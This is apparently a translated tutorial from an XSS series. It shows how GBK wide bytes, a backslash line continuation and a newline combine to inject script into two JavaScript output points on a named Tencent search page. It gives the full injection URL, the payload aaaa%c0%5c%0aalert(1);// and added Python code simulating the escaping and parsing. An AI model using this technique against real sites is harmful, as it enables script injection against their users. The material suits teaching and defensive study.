This time all three of them team up: wide bytes, backslashes and newlines ~
1. The example injection point is as follows:
http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|3500,4000&filtervalue=,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,hsdpa,hsdpa&tplname=centersearch.shtml&orderby=aaaaaaaaaaaa
Same routine as always: go and look at where our input is output.
2. There are three outputs in total. One sits inside an HTML attribute; we give that one up, because double quotes are escaped there. That leaves two, both inside <script>...</script>, right next to each other.
3. Let's look at the 2nd one first. Does it look familiar? Yes, we just met it in tutorial 6: the output lands inside a // comment. Can we use a newline again?
4. There is good news and there is bad news. The good news: a newline does end the comment, just like last time. The bad news: the same value is echoed a second time, inside a string literal, and a raw newline inside a JavaScript string literal is a syntax error that kills the whole script. So what do we do?
5. At this point we first need to talk about JavaScript. In JavaScript a string literal can be continued across lines: a backslash at the end of a line swallows the newline that follows it.
var a = "I am a string \
I am still a string";
alert(a);
6. Based on this, we can turn the two output points into the following:
// document.getElementById("order_select").value = "aaaa\
alert(1);//";
var searchOrder = "aaaa\
alert(1);//";
Parsed, the structure is: the first line is a // comment that ends at the newline, so alert(1); on the next line runs as code, and the trailing //";" is just another comment; in the second output the backslash swallows the newline, so "aaaa\<newline>alert(1);//" is one intact string literal and the script stays syntactically valid.
7. With this idea in mind, let's look at what happens to our backslash..
8. Tragically, the backslash is escaped into two backslashes, \\, which is not easy to deal with.
9. Do you still remember the wide-byte trick from tutorial 4? %c0 can eat the byte that follows it.
Let's look at the page encoding first.
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
The GBxxxx family, so wide bytes apply.
10. So our %c0 joins the battle:
http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|3500,4000&filtervalue=,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,hsdpa,hsdpa&tplname=centersearch.shtml&orderby=aaaa%c0%5c%0aalert(1);//
Look at the output in the page source: our \ has turned into a garbled character + \. The server did double the backslash byte, but the browser, decoding the page as GBK, pairs %c0 with the first %5c into a single wide character, which leaves the second backslash unescaped, right in front of our newline.
11. At this point the punctuation marks hold a meeting. Theme of the meeting: "Only when everyone is good is it truly good."
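To make the byte-level chain above concrete, here is an added example (not code from the original tutorial, and not the real filter on cgi.data.tech.qq.com). It simulates an assumed byte-wise server filter that doubles backslashes, a browser that decodes the page as GBK because of the meta tag, and a minimal scanner standing in for the JavaScript parser; the function names and the exact filter behaviour are assumptions, and the three orderby payloads are constructed inputs.

```python
# Added example, not code from the original tutorial. Simulates the chain the
# post describes: byte-wise server escaping, GBK decoding in the browser, and
# a minimal check of what the resulting <script> looks like to the JS parser.
# The filter behaviour and all names here are assumptions.
import urllib.parse


def server_escape(value: bytes) -> bytes:
    """Assumed filter: put a backslash before every '\\' and '"' byte.
    It works byte by byte and knows nothing about multi-byte GBK characters."""
    out = bytearray()
    for b in value:
        if b in (0x5C, 0x22):  # backslash or double quote
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def render_script(orderby: str) -> bytes:
    """Echoes the (escaped) orderby parameter into the two script lines the
    post shows: one inside a // comment, one inside a string literal."""
    escaped = server_escape(urllib.parse.unquote_to_bytes(orderby))
    return (b'// document.getElementById("order_select").value = "' + escaped + b'";\n'
            b'var searchOrder = "' + escaped + b'";\n')


def browser_decode(page: bytes) -> str:
    """The page declares charset=gb2312, so the browser decodes as GBK: a lead
    byte such as 0xC0 pairs with the byte after it into one wide character."""
    return page.decode("gbk", errors="replace")


def string_literal_intact(js: str, start: int) -> bool:
    """Minimal JS string-literal scanner; js[start] is the opening quote.
    A backslash consumes the next character, so backslash + newline is a line
    continuation; a raw newline leaves the literal unterminated, which is a
    SyntaxError that stops the whole script from running."""
    i = start + 1
    while i < len(js):
        c = js[i]
        if c == "\\":
            i += 2
            continue
        if c == "\n":
            return False
        if c == '"':
            return True
        i += 1
    return False


def analyse(orderby: str) -> dict:
    """Decodes the rendered page as the browser would and reports whether the
    // comment ends at our newline and whether the string literal on the
    second line still parses."""
    js = browser_decode(render_script(orderby))
    _, rest = js.split("\n", 1)
    quote = js.index('var searchOrder = "') + len("var searchOrder = ")
    return {
        "comment_ends_at_newline": rest.startswith("alert(1);"),
        "string_literal_intact": string_literal_intact(js, quote),
    }


if __name__ == "__main__":
    for p in ("aaaa%0aalert(1);//",          # newline only
              "aaaa%5c%0aalert(1);//",       # backslash + newline
              "aaaa%c0%5c%0aalert(1);//"):   # wide byte + backslash + newline
        print(p, analyse(p))
```

Only the third payload gets both results: the newline still ends the comment, and because %c0 absorbed the backslash the filter added, the one that survives turns the newline into a line continuation, so the string literal closes normally and the script is valid.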
Fix:
Refer to the previous tutorials:
XSS we learned together in those years - 4. Wide-byte revenge [QQ Mail basics]
XSS we learned together in those years - 5. Backslash revenge
XSS we learned together in those years - 6. Newline revenge